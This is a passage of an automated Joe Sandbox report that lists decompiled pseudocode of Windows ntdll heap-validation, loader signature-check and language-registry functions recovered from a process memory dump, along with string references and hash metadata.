                                                                                                            								__eflags = _t126;
                                                                                                            								if(_t126 != 0) {
                                                                                                            									_t139 = _t126;
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                                                            								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							E0108E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                                                                                            						}
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}































                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                            • API String ID: 0-1334570610
                                                                                                            • Opcode ID: fc9a5883f4ce58843cab5c9693e7f3a41e395829a76a9be45501f94ecc53391b
                                                                                                            • Instruction ID: fa3195930594dd156b606c66534de96cfdee69a449748874a892d65b688f1c7e
                                                                                                            • Opcode Fuzzy Hash: fc9a5883f4ce58843cab5c9693e7f3a41e395829a76a9be45501f94ecc53391b
                                                                                                            • Instruction Fuzzy Hash: C461C070614301DFDB69EF28C484B6ABBE5FF44314F1885A9E8D98B242D770E891CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 98%
                                                                                                            			E01077E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                            				char _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				char _v24;
                                                                                                            				signed int _t73;
                                                                                                            				void* _t77;
                                                                                                            				char* _t82;
                                                                                                            				char* _t87;
                                                                                                            				signed char* _t97;
                                                                                                            				signed char _t102;
                                                                                                            				intOrPtr _t107;
                                                                                                            				signed char* _t108;
                                                                                                            				intOrPtr _t112;
                                                                                                            				intOrPtr _t124;
                                                                                                            				intOrPtr _t125;
                                                                                                            				intOrPtr _t126;
                                                                                                            
                                                                                                            				_t107 = __edx;
                                                                                                            				_v12 = __ecx;
                                                                                                            				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                                            				_t124 = 0;
                                                                                                            				_v20 = __edx;
                                                                                                            				if(E0107CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                                                            					_t112 = _v8;
                                                                                                            				} else {
                                                                                                            					_t112 = 0;
                                                                                                            					_v8 = 0;
                                                                                                            				}
                                                                                                            				if(_t112 != 0) {
                                                                                                            					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                                                            						_t124 = 0xc000007b;
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                                                            					 *(_t125 + 0x34) = _t73;
                                                                                                            					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                                                            					_t124 = E0106C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                                                            					if(_t124 < 0) {
                                                                                                            						goto L8;
                                                                                                            					} else {
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L3:
                                                                                                            					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                                                            						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                                                            						L8:
                                                                                                            						return _t124;
                                                                                                            					}
                                                                                                            					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                                                            						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            						_t102 =  *0x1155780; // 0x0
                                                                                                            						if((_t102 & 0x00000003) != 0) {
                                                                                                            							E010E5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                                                            							_t102 =  *0x1155780; // 0x0
                                                                                                            						}
                                                                                                            						if((_t102 & 0x00000010) != 0) {
                                                                                                            							asm("int3");
                                                                                                            						}
                                                                                                            						_t124 = 0xc0000428;
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            					L5:
                                                                                                            					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            					_t77 = _a4 - 0x40000003;
                                                                                                            					if(_t77 == 0 || _t77 == 0x33) {
                                                                                                            						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                            						if(E01087D50() != 0) {
                                                                                                            							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            						} else {
                                                                                                            							_t82 = 0x7ffe0384;
                                                                                                            						}
                                                                                                            						_t108 = 0x7ffe0385;
                                                                                                            						if( *_t82 != 0) {
                                                                                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                                            								if(E01087D50() == 0) {
                                                                                                            									_t97 = 0x7ffe0385;
                                                                                                            								} else {
                                                                                                            									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                            								}
                                                                                                            								if(( *_t97 & 0x00000020) != 0) {
                                                                                                            									E010E7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if(_a4 != 0x40000003) {
                                                                                                            							L14:
                                                                                                            							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                            							if(E01087D50() != 0) {
                                                                                                            								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            							} else {
                                                                                                            								_t87 = 0x7ffe0384;
                                                                                                            							}
                                                                                                            							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                                            								if(E01087D50() != 0) {
                                                                                                            									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                            								}
                                                                                                            								if(( *_t108 & 0x00000020) != 0) {
                                                                                                            									E010E7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L8;
                                                                                                            						} else {
                                                                                                            							_v16 = _t125 + 0x24;
                                                                                                            							_t124 = E0109A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                                                            							if(_t124 < 0) {
                                                                                                            								E0106B1E1(_t124, 0x1490, 0, _v16);
                                                                                                            								goto L8;
                                                                                                            							}
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}





















                                                                                                            Strings
                                                                                                            • LdrpCompleteMapModule, xrefs: 010C9898
                                                                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 010C9891
                                                                                                            • minkernel\ntdll\ldrmap.c, xrefs: 010C98A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                            • API String ID: 0-1676968949
                                                                                                            • Opcode ID: e51916ea151827ac62c8f8b0438a2612dcc92545baeebc57ee4d7e5020588d81
                                                                                                            • Instruction ID: 0c351c087825c1d15390a0ac5207ee7e4914816b51c46ed7b122aa75133bf51a
                                                                                                            • Opcode Fuzzy Hash: e51916ea151827ac62c8f8b0438a2612dcc92545baeebc57ee4d7e5020588d81
                                                                                                            • Instruction Fuzzy Hash: DE510171A00742DBEB22CB6CC948B6A7BE4FB08754F1409A9E9D19B3E1D734ED00CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 64%
                                                                                                            			E011123E3(signed int __ecx, unsigned int __edx) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _t42;
                                                                                                            				char _t43;
                                                                                                            				signed short _t44;
                                                                                                            				signed short _t48;
                                                                                                            				signed char _t51;
                                                                                                            				signed short _t52;
                                                                                                            				intOrPtr _t54;
                                                                                                            				signed short _t64;
                                                                                                            				signed short _t66;
                                                                                                            				intOrPtr _t69;
                                                                                                            				signed short _t73;
                                                                                                            				signed short _t76;
                                                                                                            				signed short _t77;
                                                                                                            				signed short _t79;
                                                                                                            				void* _t83;
                                                                                                            				signed int _t84;
                                                                                                            				signed int _t85;
                                                                                                            				signed char _t94;
                                                                                                            				unsigned int _t99;
                                                                                                            				unsigned int _t104;
                                                                                                            				signed int _t108;
                                                                                                            				void* _t110;
                                                                                                            				void* _t111;
                                                                                                            				unsigned int _t114;
                                                                                                            
                                                                                                            				_t84 = __ecx;
                                                                                                            				_push(__ecx);
                                                                                                            				_t114 = __edx;
                                                                                                            				_t42 =  *((intOrPtr*)(__edx + 7));
                                                                                                            				if(_t42 == 1) {
                                                                                                            					L49:
                                                                                                            					_t43 = 1;
                                                                                                            					L50:
                                                                                                            					return _t43;
                                                                                                            				}
                                                                                                            				if(_t42 != 4) {
                                                                                                            					if(_t42 >= 0) {
                                                                                                            						if( *(__ecx + 0x4c) == 0) {
                                                                                                            							_t44 =  *__edx & 0x0000ffff;
                                                                                                            						} else {
                                                                                                            							_t73 =  *__edx;
                                                                                                            							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                                                                                            								_t73 = _t73 ^  *(__ecx + 0x50);
                                                                                                            							}
                                                                                                            							_t44 = _t73 & 0x0000ffff;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x115874c ^ __ecx;
                                                                                                            						if(_t104 == 0) {
                                                                                                            							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                                                                                            						} else {
                                                                                                            							_t76 = 0;
                                                                                                            						}
                                                                                                            						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                                                                                            					}
                                                                                                            					_t94 =  *((intOrPtr*)(_t114 + 7));
                                                                                                            					_t108 = _t44 & 0xffff;
                                                                                                            					if(_t94 != 5) {
                                                                                                            						if((_t94 & 0x00000040) == 0) {
                                                                                                            							if((_t94 & 0x0000003f) == 0x3f) {
                                                                                                            								if(_t94 >= 0) {
                                                                                                            									if( *(_t84 + 0x4c) == 0) {
                                                                                                            										_t48 =  *_t114 & 0x0000ffff;
                                                                                                            									} else {
                                                                                                            										_t66 =  *_t114;
                                                                                                            										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                                                                                            											_t66 = _t66 ^  *(_t84 + 0x50);
                                                                                                            										}
                                                                                                            										_t48 = _t66 & 0x0000ffff;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x115874c ^ _t84;
                                                                                                            									if(_t99 == 0) {
                                                                                                            										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                                                                                            									} else {
                                                                                                            										_t69 = 0;
                                                                                                            									}
                                                                                                            									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                                                                                            								}
                                                                                                            								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                                                                                            							} else {
                                                                                                            								_t85 = _t94 & 0x3f;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                                                                                            					}
                                                                                                            					_t110 = (_t108 << 3) - _t85;
                                                                                                            				} else {
                                                                                                            					if( *(__ecx + 0x4c) == 0) {
                                                                                                            						_t77 =  *__edx & 0x0000ffff;
                                                                                                            					} else {
                                                                                                            						_t79 =  *__edx;
                                                                                                            						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                                                                                            							_t79 = _t79 ^  *(__ecx + 0x50);
                                                                                                            						}
                                                                                                            						_t77 = _t79 & 0x0000ffff;
                                                                                                            					}
                                                                                                            					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                                                                                            				}
                                                                                                            				_t51 =  *((intOrPtr*)(_t114 + 7));
                                                                                                            				if(_t51 != 5) {
                                                                                                            					if((_t51 & 0x00000040) == 0) {
                                                                                                            						_t52 = 0;
                                                                                                            						goto L42;
                                                                                                            					}
                                                                                                            					_t64 = _t51 & 0x3f;
                                                                                                            					goto L38;
                                                                                                            				} else {
                                                                                                            					_t64 =  *(_t114 + 6) & 0x000000ff;
                                                                                                            					L38:
                                                                                                            					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                                                                                            					L42:
                                                                                                            					_t35 = _t114 + 8; // -16
                                                                                                            					_t111 = _t110 + (_t52 & 0x0000ffff);
                                                                                                            					_t83 = _t35 + _t111;
                                                                                                            					_t54 = E010BD4F0(_t83, 0x1046c58, 8);
                                                                                                            					_v8 = _t54;
                                                                                                            					if(_t54 == 8) {
                                                                                                            						goto L49;
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                            						_push("HEAP: ");
                                                                                                            						E0106B150();
                                                                                                            					} else {
                                                                                                            						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            					}
                                                                                                            					_push(_t111);
                                                                                                            					_push(_v8 + _t83);
                                                                                                            					E0106B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                                                                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                            						 *0x1156378 = 1;
                                                                                                            						asm("int3");
                                                                                                            						 *0x1156378 = 0;
                                                                                                            					}
                                                                                                            					_t43 = 0;
                                                                                                            					goto L50;
                                                                                                            				}
                                                                                                            			}




























                                                                                                            0x011124fc
                                                                                                            0x01112500
                                                                                                            0x01112512
                                                                                                            0x01112515
                                                                                                            0x0111251a
                                                                                                            0x01112521
                                                                                                            0x01112524
                                                                                                            0x01112529
                                                                                                            0x0111252f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0111253c
                                                                                                            0x0111255c
                                                                                                            0x01112561
                                                                                                            0x0111253e
                                                                                                            0x01112554
                                                                                                            0x01112559
                                                                                                            0x0111256a
                                                                                                            0x0111256d
                                                                                                            0x01112574
                                                                                                            0x01112586
                                                                                                            0x01112588
                                                                                                            0x0111258f
                                                                                                            0x01112590
                                                                                                            0x01112590
                                                                                                            0x01112597
                                                                                                            0x00000000
                                                                                                            0x01112597

                                                                                                            Strings
                                                                                                            • HEAP: , xrefs: 0111255C
                                                                                                            • HEAP[%wZ]: , xrefs: 0111254F
                                                                                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0111256F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                            • API String ID: 0-3815128232
                                                                                                            • Opcode ID: f7705b66387cfa3b82a439db16aa86e177437f05979dc0216ac0e9292739059f
                                                                                                            • Instruction ID: d1cc9bc32c57acc662390a7026f2ccad341f7b5d784e34f792301546b029de3b
                                                                                                            • Opcode Fuzzy Hash: f7705b66387cfa3b82a439db16aa86e177437f05979dc0216ac0e9292739059f
                                                                                                            • Instruction Fuzzy Hash: D3512874240260CAE77CCE1EC8847B2FBF1DB45644F754879E9C68BA89E339D842DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E0106E620(void* __ecx, short* __edx, short* _a4) {
                                                                                                            				char _v16;
                                                                                                            				char _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				char* _v28;
                                                                                                            				char _v32;
                                                                                                            				char _v36;
                                                                                                            				char _v44;
                                                                                                            				signed int _v48;
                                                                                                            				intOrPtr _v52;
                                                                                                            				void* _v56;
                                                                                                            				void* _v60;
                                                                                                            				char _v64;
                                                                                                            				void* _v68;
                                                                                                            				void* _v76;
                                                                                                            				void* _v84;
                                                                                                            				signed int _t59;
                                                                                                            				signed int _t74;
                                                                                                            				signed short* _t75;
                                                                                                            				signed int _t76;
                                                                                                            				signed short* _t78;
                                                                                                            				signed int _t83;
                                                                                                            				short* _t93;
                                                                                                            				signed short* _t94;
                                                                                                            				short* _t96;
                                                                                                            				void* _t97;
                                                                                                            				signed int _t99;
                                                                                                            				void* _t101;
                                                                                                            				void* _t102;
                                                                                                            
                                                                                                            				_t80 = __ecx;
                                                                                                            				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                                                            				_t96 = __edx;
                                                                                                            				_v44 = __edx;
                                                                                                            				_t78 = 0;
                                                                                                            				_v56 = 0;
                                                                                                            				if(__ecx == 0 || __edx == 0) {
                                                                                                            					L28:
                                                                                                            					_t97 = 0xc000000d;
                                                                                                            				} else {
                                                                                                            					_t93 = _a4;
                                                                                                            					if(_t93 == 0) {
                                                                                                            						goto L28;
                                                                                                            					}
                                                                                                            					_t78 = E0106F358(__ecx, 0xac);
                                                                                                            					if(_t78 == 0) {
                                                                                                            						_t97 = 0xc0000017;
                                                                                                            						L6:
                                                                                                            						if(_v56 != 0) {
                                                                                                            							_push(_v56);
                                                                                                            							E010A95D0();
                                                                                                            						}
                                                                                                            						if(_t78 != 0) {
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                                                            						}
                                                                                                            						return _t97;
                                                                                                            					}
                                                                                                            					E010AFA60(_t78, 0, 0x158);
                                                                                                            					_v48 = _v48 & 0x00000000;
                                                                                                            					_t102 = _t101 + 0xc;
                                                                                                            					 *_t96 = 0;
                                                                                                            					 *_t93 = 0;
                                                                                                            					E010ABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                                                            					_v36 = 0x18;
                                                                                                            					_v28 =  &_v44;
                                                                                                            					_v64 = 0;
                                                                                                            					_push( &_v36);
                                                                                                            					_push(0x20019);
                                                                                                            					_v32 = 0;
                                                                                                            					_push( &_v64);
                                                                                                            					_v24 = 0x40;
                                                                                                            					_v20 = 0;
                                                                                                            					_v16 = 0;
                                                                                                            					_t97 = E010A9600();
                                                                                                            					if(_t97 < 0) {
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            					E010ABB40(0,  &_v36, L"InstallLanguageFallback");
                                                                                                            					_push(0);
                                                                                                            					_v48 = 4;
                                                                                                            					_t97 = L0106F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                                                            					if(_t97 >= 0) {
                                                                                                            						if(_v52 != 1) {
                                                                                                            							L17:
                                                                                                            							_t97 = 0xc0000001;
                                                                                                            							goto L6;
                                                                                                            						}
                                                                                                            						_t59 =  *_t78 & 0x0000ffff;
                                                                                                            						_t94 = _t78;
                                                                                                            						_t83 = _t59;
                                                                                                            						if(_t59 == 0) {
                                                                                                            							L19:
                                                                                                            							if(_t83 == 0) {
                                                                                                            								L23:
                                                                                                            								E010ABB40(_t83, _t102 + 0x24, _t78);
                                                                                                            								if(L010743C0( &_v48,  &_v64) == 0) {
                                                                                                            									goto L17;
                                                                                                            								}
                                                                                                            								_t84 = _v48;
                                                                                                            								 *_v48 = _v56;
                                                                                                            								if( *_t94 != 0) {
                                                                                                            									E010ABB40(_t84, _t102 + 0x24, _t94);
                                                                                                            									if(L010743C0( &_v48,  &_v64) != 0) {
                                                                                                            										 *_a4 = _v56;
                                                                                                            									} else {
                                                                                                            										_t97 = 0xc0000001;
                                                                                                            										 *_v48 = 0;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L6;
                                                                                                            							}
                                                                                                            							_t83 = _t83 & 0x0000ffff;
                                                                                                            							while(_t83 == 0x20) {
                                                                                                            								_t94 =  &(_t94[1]);
                                                                                                            								_t74 =  *_t94 & 0x0000ffff;
                                                                                                            								_t83 = _t74;
                                                                                                            								if(_t74 != 0) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L23;
                                                                                                            							}
                                                                                                            							goto L23;
                                                                                                            						} else {
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            						while(1) {
                                                                                                            							L14:
                                                                                                            							_t27 =  &(_t94[1]); // 0x2
                                                                                                            							_t75 = _t27;
                                                                                                            							if(_t83 == 0x2c) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t94 = _t75;
                                                                                                            							_t76 =  *_t94 & 0x0000ffff;
                                                                                                            							_t83 = _t76;
                                                                                                            							if(_t76 != 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							goto L23;
                                                                                                            						}
                                                                                                            						 *_t94 = 0;
                                                                                                            						_t94 = _t75;
                                                                                                            						_t83 =  *_t75 & 0x0000ffff;
                                                                                                            						goto L19;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}































                                                                                                            0x010c543b
                                                                                                            0x010c543e
                                                                                                            0x010c5440
                                                                                                            0x010c5445
                                                                                                            0x010c5472
                                                                                                            0x010c5475
                                                                                                            0x010c548d
                                                                                                            0x010c5493
                                                                                                            0x010c54a9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c54ab
                                                                                                            0x010c54b4
                                                                                                            0x010c54bc
                                                                                                            0x010c54c8
                                                                                                            0x010c54de
                                                                                                            0x010c54fb
                                                                                                            0x010c54e0
                                                                                                            0x010c54e6
                                                                                                            0x010c54eb
                                                                                                            0x010c54eb
                                                                                                            0x010c54de
                                                                                                            0x00000000
                                                                                                            0x010c54bc
                                                                                                            0x010c5477
                                                                                                            0x010c547a
                                                                                                            0x010c5480
                                                                                                            0x010c5483
                                                                                                            0x010c5486
                                                                                                            0x010c548b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c548b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c5447
                                                                                                            0x010c5447
                                                                                                            0x010c5447
                                                                                                            0x010c5447
                                                                                                            0x010c544e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c5450
                                                                                                            0x010c5452
                                                                                                            0x010c5455
                                                                                                            0x010c545a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c545c
                                                                                                            0x010c546a
                                                                                                            0x010c546d
                                                                                                            0x010c546f
                                                                                                            0x00000000
                                                                                                            0x010c546f
                                                                                                            0x0106e70f

                                                                                                            Strings
                                                                                                            • InstallLanguageFallback, xrefs: 0106E6DB
                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0106E68C
                                                                                                            • @, xrefs: 0106E6C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                            • API String ID: 0-1757540487
                                                                                                            • Opcode ID: 9521f162ab476d1e5eaa6327fd07998f00ee3960992586c1cbfac692bcd05805
                                                                                                            • Instruction ID: a503948c9e76c59c53b557d8cebc2ba8ef168f74ee91b16e699e65b4ec88dd97
                                                                                                            • Opcode Fuzzy Hash: 9521f162ab476d1e5eaa6327fd07998f00ee3960992586c1cbfac692bcd05805
                                                                                                            • Instruction Fuzzy Hash: 7751B4796083069BD710DF68C880AAFB7E8BF98614F45096EF9C5D7240FB34D904CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 60%
                                                                                                            			E0108B8E4(unsigned int __edx) {
                                                                                                            				void* __ecx;
                                                                                                            				void* __edi;
                                                                                                            				intOrPtr* _t16;
                                                                                                            				intOrPtr _t18;
                                                                                                            				void* _t27;
                                                                                                            				void* _t28;
                                                                                                            				unsigned int _t30;
                                                                                                            				intOrPtr* _t31;
                                                                                                            				unsigned int _t38;
                                                                                                            				void* _t39;
                                                                                                            				unsigned int _t40;
                                                                                                            
                                                                                                            				_t40 = __edx;
                                                                                                            				_t39 = _t28;
                                                                                                            				if( *0x1158748 >= 1) {
                                                                                                            					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                                                                                            					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                                                                                            						_t18 =  *[fs:0x30];
                                                                                                            						__eflags =  *(_t18 + 0xc);
                                                                                                            						if( *(_t18 + 0xc) == 0) {
                                                                                                            							_push("HEAP: ");
                                                                                                            							E0106B150();
                                                                                                            						} else {
                                                                                                            							E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            						}
                                                                                                            						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                                                                                            						E0106B150();
                                                                                                            						__eflags =  *0x1157bc8;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							E01122073(_t27, 1, _t39, __eflags);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t38 =  *(_t39 + 0xb8);
                                                                                                            				if(_t38 != 0) {
                                                                                                            					_t13 = _t40 >> 0xc;
                                                                                                            					__eflags = _t13;
                                                                                                            					while(1) {
                                                                                                            						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                                                                                            						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_t30 =  *_t38;
                                                                                                            						__eflags = _t30;
                                                                                                            						if(_t30 != 0) {
                                                                                                            							_t38 = _t30;
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                                                            						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					return E0108AB40(_t39, _t38, 0, _t13, _t40);
                                                                                                            				} else {
                                                                                                            					_t31 = _t39 + 0x8c;
                                                                                                            					_t16 =  *_t31;
                                                                                                            					while(_t31 != _t16) {
                                                                                                            						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                                                                                            						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                                                                                            							return _t16;
                                                                                                            						}
                                                                                                            						_t16 =  *_t16;
                                                                                                            					}
                                                                                                            					return _t31;
                                                                                                            				}
                                                                                                            			}















                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                            • API String ID: 0-2558761708
                                                                                                            • Opcode ID: bb7be35fbb889ef4606bedd10263a3e53ed66c89c9d5580206f489b07a2a69f2
                                                                                                            • Instruction ID: 591804e29600bf3049a08d7f5aa79786c11302488907be9e917cb5f1129616cd
                                                                                                            • Opcode Fuzzy Hash: bb7be35fbb889ef4606bedd10263a3e53ed66c89c9d5580206f489b07a2a69f2
                                                                                                            • Instruction Fuzzy Hash: 4D11DD71318602DFD769EA1AC484B7AB7A5EB80624F1880A9E0CACF351EA34D881CB45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 60%
                                                                                                            			E0112E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                                                            				signed int _v20;
                                                                                                            				char _v24;
                                                                                                            				signed int _v40;
                                                                                                            				char _v44;
                                                                                                            				intOrPtr _v48;
                                                                                                            				signed int _v52;
                                                                                                            				unsigned int _v56;
                                                                                                            				char _v60;
                                                                                                            				signed int _v64;
                                                                                                            				char _v68;
                                                                                                            				signed int _v72;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				char _t87;
                                                                                                            				signed int _t90;
                                                                                                            				signed int _t94;
                                                                                                            				signed int _t100;
                                                                                                            				intOrPtr* _t113;
                                                                                                            				signed int _t122;
                                                                                                            				void* _t132;
